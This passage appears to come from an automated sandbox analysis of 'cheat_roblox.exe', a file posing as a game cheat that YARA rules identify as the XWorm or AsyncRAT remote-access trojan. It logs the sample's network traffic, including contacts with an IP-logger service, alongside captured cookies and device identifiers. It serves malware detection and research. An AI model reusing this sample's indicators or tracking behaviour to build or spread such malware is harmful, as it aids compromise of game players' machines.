                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                            7           192.168.2.6  49738        173.222.162.64  443
                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                            2024-07-29 22:56:51 UTC  2256               OUT        POST /threshold/xls.aspx HTTP/1.1
                                                                            Origin: https://www.bing.com
                                                                            Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                            Accept: */*
                                                                            Accept-Language: en-CH
                                                                            Content-type: text/xml
                                                                            X-Agent-DeviceId: 01000A410900C4F3
                                                                            X-BM-CBT: 1696488253
                                                                            X-BM-DateFormat: dd/MM/yyyy
                                                                            X-BM-DeviceDimensions: 784x984
                                                                            X-BM-DeviceDimensionsLogical: 784x984
                                                                            X-BM-DeviceScale: 100
                                                                            X-BM-DTZ: 120
                                                                            X-BM-Market: CH
                                                                            X-BM-Theme: 000000;0078d7
                                                                            X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                            X-Device-ClientSession: 1D6F504B5A5A465DBDB84F31C63A581D
                                                                            X-Device-isOptin: false
                                                                            X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                            X-Device-OSSKU: 48
                                                                            X-Device-Touch: false
                                                                            X-DeviceID: 01000A410900C4F3
                                                                            X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshldspcl40,msbdsborgv2co,msbwdsbi920cf,optfsth3,premsbdsbchtupcf,wsbfixcachec,wsbqfasmsall_c,wsbqfminiserp_c,wsbref-c
                                                                            X-MSEdge-ExternalExpType: JointCoord
                                                                            X-PositionerType: Desktop
                                                                            X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                            X-Search-CortanaAvailableCapabilities: None
                                                                            X-Search-SafeSearch: Moderate
                                                                            X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                            X-UserAgeClass: Unknown
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                            Host: www.bing.com
                                                                            Content-Length: 516
                                                                            Connection: Keep-Alive
                                                                            Cache-Control: no-cache
                                                                            Cookie: SRCHUID=V=2&GUID=CE2BE0509FF742BD822F50D98AD10391&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231005; SRCHHPGUSR=SRCHLANG=en&HV=1696488191&IPMH=5767d621&IPMID=1696488252989&LUT=1696487541024; CortanaAppUID=2020E25DAB158E420BA06F1C8DEF7959; MUID=81C61E09498D41CC97CDBBA354824ED1; _SS=SID=1D9FAF807E686D422B86BC217FC66C71&CPID=1696488253968&AC=1&CPH=071f2185; _EDGE_S=SID=1D9FAF807E686D422B86BC217FC66C71; MUIDB=81C61E09498D41CC97CDBBA354824ED1
                                                                            2024-07-29 22:56:51 UTC | 1 | OUT | Data Ascii: <
                                                                            2024-07-29 22:56:51 UTC | 515 | OUT | Data Ascii: ClientInstRequest><CID>81C61E09498D41CC97CDBBA354824ED1</CID><Events><E><T>Event.ClientInst</T><IG>351AA82AE90C46699F5B1FE342BE7E10</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                                            2024-07-29 22:56:51 UTC | 480 | IN | HTTP/1.1 204 No Content
                                                                            Access-Control-Allow-Origin: *
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            X-MSEdge-Ref: Ref A: 4A08A98A0FB64F6CB8B62E42CE4B4EEE Ref B: LAX311000111049 Ref C: 2024-07-29T22:56:51Z
                                                                            Date: Mon, 29 Jul 2024 22:56:51 GMT
                                                                            Connection: close
                                                                            Alt-Svc: h3=":443"; ma=93600
                                                                            X-CDN-TraceID: 0.40a6dc17.1722293811.120626bd


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            8 | 192.168.2.6 | 49741 | 35.190.80.1 | 443 | 3136 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-07-29 22:56:51 UTC | 476 | OUT | POST /report/v4?s=wepIYRj6hGg3QGVIT5VH6A70mLLrXrHRIZacHp5Uj9LFm07dm8md12BJjcIUgxXzHYylLEQH6abs8VB7e%2BsKS1HygcQDMquR0M2QLhBEeTy684s%2BdJAkYP%2BfKFsCcxn0guxL HTTP/1.1
                                                                            Host: a.nel.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Content-Length: 424
                                                                            Content-Type: application/reports+json
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-07-29 22:56:51 UTC | 424 | OUT | Data Ascii: [{"age":0,"body":{"elapsed_time":663,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://2no.co/","sampling_fraction":1.0,"server_ip":"172.67.132.113","status_code":403,"type":"http.error"},"type":"network-error","url":"https://
                                                                            2024-07-29 22:56:51 UTC | 168 | IN | HTTP/1.1 200 OK
                                                                            Content-Length: 0
                                                                            date: Mon, 29 Jul 2024 22:56:51 GMT
                                                                            Via: 1.1 google
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            9 | 192.168.2.6 | 49740 | 88.212.201.204 | 443 | 3136 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-07-29 22:56:51 UTC | 707 | OUT | GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738 HTTP/1.1
                                                                            Host: counter.yadro.ru
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: image
                                                                            Referer: https://2no.co/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Cookie: FTID=1cg1uo1y3WOr1cg1uo00241O
                                                                            2024-07-29 22:56:52 UTC | 481 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx/1.17.9
                                                                            Date: Mon, 29 Jul 2024 22:56:52 GMT
                                                                            Content-Type: image/gif
                                                                            Content-Length: 445
                                                                            Connection: close
                                                                            Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                            Pragma: no-cache
                                                                            Cache-control: no-cache
                                                                            P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                            Set-Cookie: VID=2DNPIG0nbdur1cg1uq002NPY; path=/; expires=Tue, 29 Jul 2025 21:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                            Access-Control-Allow-Origin: *
                                                                            Strict-Transport-Security: max-age=86400


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            10 | 192.168.2.6 | 49744 | 172.67.132.113 | 443 | 3136 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-07-29 22:56:52 UTC | 577 | OUT | GET /favicon.ico HTTP/1.1
                                                                            Host: cdn.iplogger.org
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: image
                                                                            Referer: https://2no.co/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-07-29 22:56:52 UTC | 763 | IN | HTTP/1.1 200 OK
                                                                            Date: Mon, 29 Jul 2024 22:56:52 GMT
                                                                            Content-Type: image/x-icon
                                                                            Content-Length: 2833
                                                                            Connection: close
                                                                            last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                            etag: "629f3a26-b11"
                                                                            strict-transport-security: max-age=31536000
                                                                            x-frame-options: SAMEORIGIN
                                                                            Cache-Control: max-age=14400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 6490
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2FuU%2Bxp1oN3x3M5GtoZoziQ45J4yObHhGTIxws2KFdu%2BeFWB5ZJ%2F6H2yyhHwiPwt0nNTwR9XXa%2BpWklmbTmZYRSECIR9i75kgYmT0G3%2FxJlV%2FPAXxZRmHxxpBZ5UvLJX34qN"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ab0b46a1c3e32d3-EWR
                                                                            alt-svc: h3=":443"; ma=86400


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            11 | 192.168.2.6 | 49745 | 88.212.201.198 | 443 | 3136 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-07-29 22:56:53 UTC | 511 | OUT | GET /hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738 HTTP/1.1
                                                                            Host: counter.yadro.ru
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            Cookie: FTID=1cg1uo1y3WOr1cg1uo00241O; VID=2DNPIG0nbdur1cg1uq002NPY
                                                                            2024-07-29 22:56:53 UTC | 459 | IN | HTTP/1.1 200 OK
                                                                            Server: nginx/1.17.9
                                                                            Date: Mon, 29 Jul 2024 22:56:53 GMT
                                                                            Content-Type: image/gif
                                                                            Content-Length: 445
                                                                            Connection: close
                                                                            Expires: Sun, 30 Jul 2023 21:00:00 GMT
                                                                            Pragma: no-cache
                                                                            Cache-control: no-cache
                                                                            P3P: policyref="/w3c/p3p.xml", CP="UNI"
                                                                            Set-Cookie: FTID=0; path=/; expires=Sat, 01 Jan 2000 00:00:00 GMT; HttpOnly; Secure; SameSite=None; domain=.yadro.ru
                                                                            Access-Control-Allow-Origin: *
                                                                            Strict-Transport-Security: max-age=86400


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            12 | 192.168.2.6 | 49747 | 172.67.132.113 | 443 | 3136 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            2024-07-29 22:56:53 UTC | 351 | OUT | GET /favicon.ico HTTP/1.1
                                                                            Host: cdn.iplogger.org
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-07-29 22:56:53 UTC | 757 | IN | HTTP/1.1 200 OK
                                                                            Date: Mon, 29 Jul 2024 22:56:53 GMT
                                                                            Content-Type: image/x-icon
                                                                            Content-Length: 2833
                                                                            Connection: close
                                                                            last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                            etag: "629f3a26-b11"
                                                                            strict-transport-security: max-age=31536000
                                                                            x-frame-options: SAMEORIGIN
                                                                            Cache-Control: max-age=14400
                                                                            CF-Cache-Status: HIT
                                                                            Age: 6491
                                                                            Accept-Ranges: bytes
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w5tzPLmglCSG%2F%2BofcB5Ux92lvL4JDtWpuh4xhCsBTqYjlSMhnEIdT925ctGYHrcL7fqfdOgVIlwRcqxQfNRzb0CkOFyjb%2B21j6pzUae9eE9xCxCqWq5BoQePKMSJwmPt%2BbvC"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ab0b46e4edc4210-EWR
                                                                            alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49748 | 23.32.185.164 | 443
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:56:54 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            Accept-Encoding: identity
                                                                            User-Agent: Microsoft BITS/7.8
                                                                            Host: fs.microsoft.com
2024-07-29 22:56:54 UTC | 467 | IN | HTTP/1.1 200 OK
                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                            Content-Type: application/octet-stream
                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                            Server: ECAcc (chd/0759)
                                                                            X-CID: 11
                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                            X-Ms-Region: prod-eus-z1
                                                                            Cache-Control: public, max-age=202064
                                                                            Date: Mon, 29 Jul 2024 22:56:54 GMT
                                                                            Connection: close
                                                                            X-CID: 2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49749 | 23.32.185.164 | 443
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:56:55 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            Accept-Encoding: identity
                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                            Range: bytes=0-2147483646
                                                                            User-Agent: Microsoft BITS/7.8
                                                                            Host: fs.microsoft.com
2024-07-29 22:56:55 UTC | 535 | IN | HTTP/1.1 200 OK
                                                                            Content-Type: application/octet-stream
                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                            ApiVersion: Distribute 1.1
                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                            X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                            Cache-Control: public, max-age=202041
                                                                            Date: Mon, 29 Jul 2024 22:56:55 GMT
                                                                            Content-Length: 55
                                                                            Connection: close
                                                                            X-CID: 2
2024-07-29 22:56:55 UTC | 55 | IN | Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


Session ID | Source IP | Source Port | Destination IP | Destination Port
15 | 192.168.2.6 | 49750 | 40.113.110.67 | 443
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:56:57 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: bERunYVZNUGL7F+n.1Context: 310f5e406a47ecc5
2024-07-29 22:56:57 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-29 22:56:57 UTC | 1064 | OUT | Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: bERunYVZNUGL7F+n.2Context: 310f5e406a47ecc5<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAX5uZNJtlCsrIwWSFkput0f6ptpjcGX11avNSdRXSVlgzhZDyMPl7VpkDAEqdEDq8ZPBs0WymhPstp95UHsw1FxIRuy3X0T8Of4sdYEpcprdou
2024-07-29 22:56:57 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: bERunYVZNUGL7F+n.3Context: 310f5e406a47ecc5<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-07-29 22:56:57 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-07-29 22:56:57 UTC | 58 | IN | Data Ascii: MS-CV: Dc8OAKdpo0Kp7jsfXtZV4g.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
16 | 192.168.2.6 | 49751 | 40.113.110.67 | 443
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:57:17 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: alRNgyeHqE6MXaAp.1Context: 98c5620901a5cb3e
2024-07-29 22:57:17 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-29 22:57:17 UTC | 1064 | OUT | Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: alRNgyeHqE6MXaAp.2Context: 98c5620901a5cb3e<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAX5uZNJtlCsrIwWSFkput0f6ptpjcGX11avNSdRXSVlgzhZDyMPl7VpkDAEqdEDq8ZPBs0WymhPstp95UHsw1FxIRuy3X0T8Of4sdYEpcprdou
2024-07-29 22:57:17 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: alRNgyeHqE6MXaAp.3Context: 98c5620901a5cb3e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-07-29 22:57:17 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-07-29 22:57:17 UTC | 58 | IN | Data Ascii: MS-CV: yUoURe+1zkqmb+Vx/vDAuw.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 49753 | 20.12.23.50 | 443
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:57:27 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Sh9hBMxfPmon+V7&MD=w1bAu+gC HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                            Host: slscr.update.microsoft.com
2024-07-29 22:57:27 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Content-Type: application/octet-stream
                                                                            Expires: -1
                                                                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                            MS-CorrelationId: 77ebd27e-4a02-4048-9433-0282ed370fa0
                                                                            MS-RequestId: 9ffc8e85-130a-4f78-9e94-2a0fd1df1691
                                                                            MS-CV: lJ9uZRtXoUuzYn4l.0
                                                                            X-Microsoft-SLSClientCache: 1440
                                                                            Content-Disposition: attachment; filename=environment.cab
                                                                            X-Content-Type-Options: nosniff
                                                                            Date: Mon, 29 Jul 2024 22:57:27 GMT
                                                                            Connection: close
                                                                            Content-Length: 30005


Session ID | Source IP | Source Port | Destination IP | Destination Port
18 | 192.168.2.6 | 49754 | 40.113.110.67 | 443
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:57:45 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: /xNQht8wH0uODgOY.1Context: 735459171a2a8a1e
2024-07-29 22:57:45 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-29 22:57:45 UTC | 1064 | OUT | Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: /xNQht8wH0uODgOY.2Context: 735459171a2a8a1e<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAX5uZNJtlCsrIwWSFkput0f6ptpjcGX11avNSdRXSVlgzhZDyMPl7VpkDAEqdEDq8ZPBs0WymhPstp95UHsw1FxIRuy3X0T8Of4sdYEpcprdou
2024-07-29 22:57:45 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: /xNQht8wH0uODgOY.3Context: 735459171a2a8a1e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-07-29 22:57:45 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-07-29 22:57:45 UTC | 58 | IN | Data Ascii: MS-CV: hmEslihf3EuQn74tU5xzKg.0Payload parsing failed.


Session ID | Source IP | Source Port | Destination IP | Destination Port
19 | 192.168.2.6 | 58795 | 40.113.110.67 | 443
Timestamp | Bytes transferred | Direction | Data
2024-07-29 22:58:18 UTC | 71 | OUT | Data Ascii: CNT 1 CON 305MS-CV: 4kpOeNohu0ukWZvI.1Context: 24fb880e02e957ff
2024-07-29 22:58:18 UTC | 249 | OUT | Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-29 22:58:18 UTC | 1064 | OUT | Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 4kpOeNohu0ukWZvI.2Context: 24fb880e02e957ff<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAX5uZNJtlCsrIwWSFkput0f6ptpjcGX11avNSdRXSVlgzhZDyMPl7VpkDAEqdEDq8ZPBs0WymhPstp95UHsw1FxIRuy3X0T8Of4sdYEpcprdou
2024-07-29 22:58:18 UTC | 218 | OUT | Data Ascii: BND 3 CON\WNS 0 197MS-CV: 4kpOeNohu0ukWZvI.3Context: 24fb880e02e957ff<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-07-29 22:58:18 UTC | 14 | IN | Data Ascii: 202 1 CON 58
2024-07-29 22:58:18 UTC | 58 | IN | Data Ascii: MS-CV: 8KNQKTzRcUiQiNbIHE5RJw.0Payload parsing failed.


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            20192.168.2.65879740.113.110.67443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-29 22:59:09 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 49 69 74 47 41 68 49 75 4c 55 43 50 4b 37 75 4e 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 32 64 65 62 30 62 33 36 63 65 64 61 33 34 36 0d 0a 0d 0a
                                                                            Data Ascii: CNT 1 CON 305MS-CV: IitGAhIuLUCPK7uN.1Context: a2deb0b36ceda346
                                                                            2024-07-29 22:59:09 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                            2024-07-29 22:59:09 UTC, 1064 bytes, OUT
                                                                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: IitGAhIuLUCPK7uN.2Context: a2deb0b36ceda346<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAX5uZNJtlCsrIwWSFkput0f6ptpjcGX11avNSdRXSVlgzhZDyMPl7VpkDAEqdEDq8ZPBs0WymhPstp95UHsw1FxIRuy3X0T8Of4sdYEpcprdou
                                                                            2024-07-29 22:59:09 UTC, 218 bytes, OUT
                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: IitGAhIuLUCPK7uN.3Context: a2deb0b36ceda346<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                            2024-07-29 22:59:10 UTC, 14 bytes, IN
                                                                            Data Ascii: 202 1 CON 58
                                                                            2024-07-29 22:59:10 UTC, 58 bytes, IN
                                                                            Data Ascii: MS-CV: D94pF0TcM0W+ZmmwXz8QrA.0Payload parsing failed.


                                                                            Target ID:0
                                                                            Start time:18:56:29
                                                                            Start date:29/07/2024
                                                                            Path:C:\Users\user\Desktop\cheat_roblox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Users\user\Desktop\cheat_roblox.exe"
                                                                            Imagebase:0x7ff693e50000
                                                                            File size:2'675'335 bytes
                                                                            MD5 hash:D49B1A211CE49BED3E766471501819C6
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000003.2110891965.000001CD51F82000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:18:56:32
                                                                            Start date:29/07/2024
